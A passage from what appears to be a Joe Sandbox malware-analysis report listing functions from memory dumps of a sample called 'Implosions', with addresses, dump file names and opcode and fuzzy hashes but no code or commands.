              • Opcode ID: b40a4adc5db45f7991f86b0dae98bb37a4ae640d6d6c26460bb29d3d4b524159
              • Instruction ID: 572f079cde92c7699e8b7efa428da60043c218381f1e767772d976d7b8e6f57f
              • Opcode Fuzzy Hash: b40a4adc5db45f7991f86b0dae98bb37a4ae640d6d6c26460bb29d3d4b524159
              • Instruction Fuzzy Hash: DC21F672B042129FDB14DF75D998A6EBBB6FF80704B404878EA02DB350DB70E910CB90
              Function 05CE487B Relevance: .1, Instructions: 73COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b81e220d485a2cc1b3283e55ef297480b48b6099b838dee705a8ddc1197f0603
              • Instruction ID: 6bdcf85a45033273f0803bee2ea60c196ab29b2f1aa6b639e297de9a93116e68
              • Opcode Fuzzy Hash: b81e220d485a2cc1b3283e55ef297480b48b6099b838dee705a8ddc1197f0603
              • Instruction Fuzzy Hash: 8121CC357003019BCB18AF34D4D4A6ABBA3EFC42207248968E8068B355DF30EC85CB90
              Function 05CE0109 Relevance: .1, Instructions: 72COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2b42157848b09c62d3c11881f2754c2997bb88ca8efba88f6c66968a4b28c48c
              • Instruction ID: 1465869346a2938f148767d82f67b56f71ae5e30147a08b0399ffb588450fd4f
              • Opcode Fuzzy Hash: 2b42157848b09c62d3c11881f2754c2997bb88ca8efba88f6c66968a4b28c48c
              • Instruction Fuzzy Hash: D6214F35A14210CFC754CF19C484959FBF5EF89220B59C4AAE909EF326C6B0ED01CBA0
              Function 05CE0031 Relevance: .1, Instructions: 72COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0f1b37c83b7d9c97f4b656e7531040af2022febe39da30be9628b64d8245ce8b
              • Instruction ID: 01eda2b06febfb05b6c7cc081872bf325ef7730cd13882084cc9aa14b730ac66
              • Opcode Fuzzy Hash: 0f1b37c83b7d9c97f4b656e7531040af2022febe39da30be9628b64d8245ce8b
              • Instruction Fuzzy Hash: B2212371B001056BCB15F7B4D891AAEF7BBDFC5240F948828D204EB354DF31AD0587A1
              Function 05CE8DE0 Relevance: .1, Instructions: 72COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0ee7ec52d1b8684847524fd23e46734bce0904d1381c6dc1aeed8fd71ae32f16
              • Instruction ID: fff8e79d0b7d5adfc7d65ddccd1f375389e2a0072f88f16c5c8f28e62b2d8490
              • Opcode Fuzzy Hash: 0ee7ec52d1b8684847524fd23e46734bce0904d1381c6dc1aeed8fd71ae32f16
              • Instruction Fuzzy Hash: 5621873431435287DB245ABA9848B3A77ABAFC5E05754682BE403C7FC4DE71C941D7A2
              Function 05DE60DB Relevance: .1, Instructions: 71COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a5b2e689ef3a94b0cbaed19d8dddab6eaeed9c30d2f97b734bf05edb1bd522b3
              • Instruction ID: dfaccd9b6a470a03f9260bffe80fec5f5fa98564a367764ff6ce473a8c4d7d32
              • Opcode Fuzzy Hash: a5b2e689ef3a94b0cbaed19d8dddab6eaeed9c30d2f97b734bf05edb1bd522b3
              • Instruction Fuzzy Hash: 5321F770A046018FCB21EB78D84876DBBF2BF54320F64465AD566DB3A2DB30ED41CB91
              Function 05CAD550 Relevance: .1, Instructions: 71COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a8f521649a01f4523e42b1b3151f44537fc9c7c3347ee0897a8fc99f7b81e96d
              • Instruction ID: d448e64c268d88828343eb102a3d83b3f273248143927c921b8e7220fb9d97c3
              • Opcode Fuzzy Hash: a8f521649a01f4523e42b1b3151f44537fc9c7c3347ee0897a8fc99f7b81e96d
              • Instruction Fuzzy Hash: 6A11C4727007155FC715AAB9E845A6FBBEAEBC82647544879F91AC3700EF31EC028794
              Function 05CA4A10 Relevance: .1, Instructions: 71COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 873a2380f9f3d7b91f499c46761a73db5038fb947e2b874d40571c7639b37830
              • Instruction ID: b2755821c7c915478aa111d323c23b0737d24a401c0d861d8b5c6ecc0b721419
              • Opcode Fuzzy Hash: 873a2380f9f3d7b91f499c46761a73db5038fb947e2b874d40571c7639b37830
              • Instruction Fuzzy Hash: 97219571A0020A9FDF18DF69D480B9ABBA2FF84314F14C979D4085B355DBB1ED4A8BD4
              Function 05D65CE3 Relevance: .1, Instructions: 71COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 84aa54af4019f5324e53f5256d266334cd6dc2a046e71b2afb67f2e858852634
              • Instruction ID: 2fac37f379083583e23dd8b042cb9cb2bbe357272beb651f721f0c318f8a2c55
              • Opcode Fuzzy Hash: 84aa54af4019f5324e53f5256d266334cd6dc2a046e71b2afb67f2e858852634
              • Instruction Fuzzy Hash: 86210075B105158FCB04DF69D988D6ABBFAFF89610B2540A9E506EB371CB30EC02CB60
              Function 05D60963 Relevance: .1, Instructions: 71COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 656f987db2920183ccd8547c24f1879241da8d3891317cd78bd289f872b12de1
              • Instruction ID: 677b977e1f87635d46e4ecda75fd18e5a2d44594a89eae1ade16d43efa62b9d3
              • Opcode Fuzzy Hash: 656f987db2920183ccd8547c24f1879241da8d3891317cd78bd289f872b12de1
              • Instruction Fuzzy Hash: 0B211D32D1011EAFCF05EFA8D8449EEBBB6FF58310F04412AE515B7250EB30AA55CBA0
              Function 05DE8AA0 Relevance: .1, Instructions: 70COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f54a6694c7f6c66fde8c5946b29236f2f077d032a02b80fd11b52667cdf80d8d
              • Instruction ID: 647001cbdfbf6baa5ae42f64a0236d60b330d6e8272a8f44fb1053173ccd4185
              • Opcode Fuzzy Hash: f54a6694c7f6c66fde8c5946b29236f2f077d032a02b80fd11b52667cdf80d8d
              • Instruction Fuzzy Hash: F421AC31B043029FDB15EB68D9456AEBFA6EF94204B14856AE806C7351EF34DE02DB84
              Function 05D60968 Relevance: .1, Instructions: 70COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9e87abe74abfd186f3023690ff581bd2e4014ecd6f0fb3e788ba6227c040bf6b
              • Instruction ID: cfdf56c102598a1d2891e1785d7204fa5d87cf91fd323828f37591262742f0d8
              • Opcode Fuzzy Hash: 9e87abe74abfd186f3023690ff581bd2e4014ecd6f0fb3e788ba6227c040bf6b
              • Instruction Fuzzy Hash: BE212F31D1011EAFCF05DFA8D8449EEBBB6FF48310F04412AE515B7250EB30AA55CBA0
              Function 05DE5F43 Relevance: .1, Instructions: 69COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a43b99a1e6a338f2b3524e9d209ac025a79210ca8af9581e6df25e0e7094cc58
              • Instruction ID: cbeee37e506403dc9cf529ee47cb6e152dc6abb49f9fb7d010c8c6c0738f90d1
              • Opcode Fuzzy Hash: a43b99a1e6a338f2b3524e9d209ac025a79210ca8af9581e6df25e0e7094cc58
              • Instruction Fuzzy Hash: 8521DB743002018FCB14DB6DE590D5AB7E6FFCC358765896AE149CB729DB70EC059B90
              Function 05CAD9C8 Relevance: .1, Instructions: 69COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bb0b0c63ea4cc8f235649eee5889f87da22ff64649365f0112267ab273ec0082
              • Instruction ID: 9ae4f8e3580203848f86ee9a143a6836941bff0a1a9dff63433f764a68d80df0
              • Opcode Fuzzy Hash: bb0b0c63ea4cc8f235649eee5889f87da22ff64649365f0112267ab273ec0082
              • Instruction Fuzzy Hash: 04217932204205CFC7148F66D405B95BBB2FB84325F058429E506CBB90CB36DC01CBA0
              Function 05CE92F0 Relevance: .1, Instructions: 67COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ba87dd89896a077682e0c184a389c60210fdae819c869a66892fb5a57979e7db
              • Instruction ID: 3fea71897395903e5d0cc5bdbaf724c7fab31a587c0259d5b13701cacb108963
              • Opcode Fuzzy Hash: ba87dd89896a077682e0c184a389c60210fdae819c869a66892fb5a57979e7db
              • Instruction Fuzzy Hash: 6611BF357002056BCB44ABA99894BBFBBB7EFC8210F548429F906DB381DF359D05D7A1
              Function 05CE0040 Relevance: .1, Instructions: 65COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7eeaa96be9689bea1f424f15bd10fc7e9f8a2ce855432607cb1b35ec313e2494
              • Instruction ID: c4ed713ef9add15bbebe3c4fb0a9042b84dfa6a67dea532f9ffeefcfeef9268e
              • Opcode Fuzzy Hash: 7eeaa96be9689bea1f424f15bd10fc7e9f8a2ce855432607cb1b35ec313e2494
              • Instruction Fuzzy Hash: 9111E470B001056FCB15EBA8D890AAEF7B7DFC4340F544528D605AB354DF71AD0587A1
              Function 05D64928 Relevance: .1, Instructions: 64COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 780b1b22d57d3506fafeaaa34120a77191e7e1da6de16b4ef885c4f53820b0e1
              • Instruction ID: ee388dc8dc1c94266db5ae573db2bc49fe7711ff28e8490338c61dc3b86678a1
              • Opcode Fuzzy Hash: 780b1b22d57d3506fafeaaa34120a77191e7e1da6de16b4ef885c4f53820b0e1
              • Instruction Fuzzy Hash: D711AF316407149FC324CF2AC984A4ABBE6EF89310B14897EE449C7661EB71FC468B90
              Function 05CE9300 Relevance: .1, Instructions: 63COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8a35a5f0effcd15951b6a21ed6181c4d0251d9ebd9d90ba7d24e78116877462f
              • Instruction ID: 17be5a5f553671f7f9bcaa27a167362c12c7a9cf7165bf490548c777bee62a7e
              • Opcode Fuzzy Hash: 8a35a5f0effcd15951b6a21ed6181c4d0251d9ebd9d90ba7d24e78116877462f
              • Instruction Fuzzy Hash: 3711A035B002046BCB44ABA99894A7EBBE7EFC8210B548829F906DB380DF349D05D7A1
              Function 05CEAEF0 Relevance: .1, Instructions: 63COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d665132fd20ad816e0d5547a48f62d3c1e099838889a91556d766ec450e47ac0
              • Instruction ID: e5df4022849d14d87d0b81458ad5ad4f7dffc9a33e5c1ced2589990392cd74a4
              • Opcode Fuzzy Hash: d665132fd20ad816e0d5547a48f62d3c1e099838889a91556d766ec450e47ac0
              • Instruction Fuzzy Hash: F21191303241504BEB1817B8A42C76E2BCFDBC5765F28492EA426C7FD4CE65CC4687E1
              Function 05CE3A50 Relevance: .1, Instructions: 63COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: de93699c846015e5a201db26c613182efcd10b08b38f1a4a63def64904f6c23c
              • Instruction ID: 830baf4264d5c058f2cf7d6379e6979ddef78a81a8ff9b777a8d99999e003601
              • Opcode Fuzzy Hash: de93699c846015e5a201db26c613182efcd10b08b38f1a4a63def64904f6c23c
              • Instruction Fuzzy Hash: 0911A3357143818FCB656BB9E45962A7BEAFF882517184879E805C7344EE35EC42CB90
              Function 05D67C85 Relevance: .1, Instructions: 60COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 62ecbe5e4a0ae031263403354cdba2679ad40238096c6af7a21e1de4cd41479a
              • Instruction ID: ed8b3061ebf17f0284a7b2880db3ea43adc8c348a3b4f796d3d006406bd02f48
              • Opcode Fuzzy Hash: 62ecbe5e4a0ae031263403354cdba2679ad40238096c6af7a21e1de4cd41479a
              • Instruction Fuzzy Hash: FF21EA79A01204DFCB09DFA9E458DADBBB2FF88311B158566F8069B325DB31D852CF50
              Function 05DEB83B Relevance: .1, Instructions: 59COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 46dd2807ab16c8e0a6135d029ca5063138a0d982a2e4b3cc4d1beffa40ae6ea5
              • Instruction ID: 443d8fff05c2cb1052fb318d452a02c1fea3543e1308e8acb9e6e73ceb2849f6
              • Opcode Fuzzy Hash: 46dd2807ab16c8e0a6135d029ca5063138a0d982a2e4b3cc4d1beffa40ae6ea5
              • Instruction Fuzzy Hash: 20219DB1A152199FCB00DFA8D8449AFBFB9FF49310F14456AE549E3311DB309A06CBA1
              Function 05CA8B38 Relevance: .1, Instructions: 58COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ddf67568336772f2ef968706a35851a429089cd8f8f8c89d9e676270cc138367
              • Instruction ID: 8e41c624460de41a509148d21ea1f8347472af76c71ca8ba3c5fc363500a4f44
              • Opcode Fuzzy Hash: ddf67568336772f2ef968706a35851a429089cd8f8f8c89d9e676270cc138367
              • Instruction Fuzzy Hash: 10119E30700601AFCB18AB79E49896EBBA7FFC86143901869E50AC7760DF75EC02CBD1
              Function 05CA8B28 Relevance: .1, Instructions: 57COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c9153258dcbb394ec71123ccfe6ed4599e7cc7f3dcced40e98461afebc9bbbd0
              • Instruction ID: 19a85733ebb7e9babe45184a29b66e879c6e5fad50a59b126708d4c23a8146b1
              • Opcode Fuzzy Hash: c9153258dcbb394ec71123ccfe6ed4599e7cc7f3dcced40e98461afebc9bbbd0
              • Instruction Fuzzy Hash: 4111C230700201AFC718AB79E49896EBBE6FFC96143941469E506CB7A0DF75EC02CBE1
              Function 05D66858 Relevance: .1, Instructions: 57COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 23e395b1c77ee9e4d3ab74f10795f9b54cf4aee82cf8f33679a7ee45e7c06239
              • Instruction ID: 7f2216fe67938cf89084bc3d1ad500eacd386dd34f9a0b0af911ad63256cb7f3
              • Opcode Fuzzy Hash: 23e395b1c77ee9e4d3ab74f10795f9b54cf4aee82cf8f33679a7ee45e7c06239
              • Instruction Fuzzy Hash: BD117C35700204DFCB14DB78C99499ABBF6FF88310B1508AAE902EB761DA71EC02CB91
              Function 05CECD26 Relevance: .1, Instructions: 56COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3cb6e112b3860c2d9e12cc8eb2c0255dab7763df8a81acc078f29a279648dc90
              • Instruction ID: 164fea96bbda523d619ad814a3fe6d02148774dc138fe0a7c5115b10635f31de
              • Opcode Fuzzy Hash: 3cb6e112b3860c2d9e12cc8eb2c0255dab7763df8a81acc078f29a279648dc90
              • Instruction Fuzzy Hash: D3113D30A40208CFCB44EBB8C854BEDBBB6FF88300F508559E916AB2A0DF70AD41CB54
              Function 05D64D78 Relevance: .1, Instructions: 56COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f8319577dfb361b834562c1388f4cfc545bffc1dc76f1192ec2696e481611189
              • Instruction ID: c17e4f881cdef2761de3561eaca4e0081bd015e39903c8be74b7c7e73e18a776
              • Opcode Fuzzy Hash: f8319577dfb361b834562c1388f4cfc545bffc1dc76f1192ec2696e481611189
              • Instruction Fuzzy Hash: C8010432B043085FCB41ABADA4406AE7BA9EB85250F4485FBF509D7741EF3098068BD4
              Function 05CE0509 Relevance: .1, Instructions: 55COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4fd3cb2d46d9c7b5dbbd11e9f75bc4e650a145eb064f8a158f87a04bdaa1b9c2
              • Instruction ID: 9ad6f5908a4b72309ee68c30db66e56d593ea93623602e49f1bee765e47cff67
              • Opcode Fuzzy Hash: 4fd3cb2d46d9c7b5dbbd11e9f75bc4e650a145eb064f8a158f87a04bdaa1b9c2
              • Instruction Fuzzy Hash: 5311CE79B003009FC329AB74D09862ABBA6FF892163104938E81ADB340CF349C51CFE0
              Function 05D66854 Relevance: .1, Instructions: 55COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d761ddb22b1d5c7a0e3bf670595da88d8f6c1cb6acabf508619697888b8b20fb
              • Instruction ID: a801d26279918ed5208a6e40bf514fc5e15f477a937be4a043610f440c656bab
              • Opcode Fuzzy Hash: d761ddb22b1d5c7a0e3bf670595da88d8f6c1cb6acabf508619697888b8b20fb
              • Instruction Fuzzy Hash: CF11C4317002049FCB04DB78C95499AB7F6FF88310B15087EE502EB761DA31EC02CBA1
              Function 05CE0518 Relevance: .1, Instructions: 54COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1484bc01d18be84d5be16e67a3e98130e2bde27e1c661512546956541075c15d
              • Instruction ID: 4d2e85997332752238bc78769910dea81e3d31d7a1c6ac9d8ef0e35b3ef7df45
              • Opcode Fuzzy Hash: 1484bc01d18be84d5be16e67a3e98130e2bde27e1c661512546956541075c15d
              • Instruction Fuzzy Hash: 55115A357007119FC729AB74D49882ABBA6FF8A225350493CE91AD7354CF35AC51DBE0
              Function 05CEBDB0 Relevance: .1, Instructions: 54COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4b33a9faf71bda0ae433bf1e6ec921e891eee2fd1291af128e465596a52bb76d
              • Instruction ID: b960e260bf14c88ea17f6362e3e0c3b6e8ef5e94ed04cf0ed954cea78803c1a8
              • Opcode Fuzzy Hash: 4b33a9faf71bda0ae433bf1e6ec921e891eee2fd1291af128e465596a52bb76d
              • Instruction Fuzzy Hash: 991148767083C08FDB12DB7C98909AA7FA1EF8621431588ABE0C8DB356D634DC0587A0
              Function 05DE7C38 Relevance: .1, Instructions: 54COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e9ddbd3ba1b463559da64e417e8cd2dee9efa7655ff32cfc8ea47ee0d9b76d70
              • Instruction ID: 2cc8a15569e6a203436263de3c7d27a1100bda0f17b8acba6544c91010a52d4f
              • Opcode Fuzzy Hash: e9ddbd3ba1b463559da64e417e8cd2dee9efa7655ff32cfc8ea47ee0d9b76d70
              • Instruction Fuzzy Hash: 01115E31300601AF87649F69D884D66BBFBFF886103108529F68BCB660DF31EC41DBA0
              Function 05D610E9 Relevance: .1, Instructions: 54COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4abdea6cf838b533d72bbab8c4b89cb79f67ccd0eba942e044d0aab7040391d9
              • Instruction ID: f00df266f1a5b0ff5d5e72f6fbd768e15973b0e2f229d8378319937723345c03
              • Opcode Fuzzy Hash: 4abdea6cf838b533d72bbab8c4b89cb79f67ccd0eba942e044d0aab7040391d9
              • Instruction Fuzzy Hash: 62118170E012499FDB14CBA8C554BEDBBF2AF88300F108066E911BB394DB749C45CFA0
              Function 05DEDE28 Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 21e954fea6ac451a970d21686ececdf5a769debaa4d3cb6b86ffeb47b89777fa
              • Instruction ID: 53d1abb74acbb73da1475ddfa25c88a9c3526224c113a489ddef1d32e19aa165
              • Opcode Fuzzy Hash: 21e954fea6ac451a970d21686ececdf5a769debaa4d3cb6b86ffeb47b89777fa
              • Instruction Fuzzy Hash: 83115B36E0428ADECF01DBA8C4446EEFBB2FFA9300F148167E544A7211D7799659CB91
              Function 05CA5DA3 Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 77a12ef408edffe77d3f11bf2add10c3f35a1d7c11fc627c6f675e01a80207cc
              • Instruction ID: 9c24e847e9a2d535bab5c928215664cb819ef8a1c1437ee3254525a4e0d3a67a
              • Opcode Fuzzy Hash: 77a12ef408edffe77d3f11bf2add10c3f35a1d7c11fc627c6f675e01a80207cc
              • Instruction Fuzzy Hash: 72110432A042598FCF24DB68C5095DDBFF1FF4D304F448469E402B7251DB749944CB60
              Function 05CE84BB Relevance: .1, Instructions: 52COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3a41c880159bec2885023b16f0b36f36cc86031a1c06ee6750f8004c8ae6def4
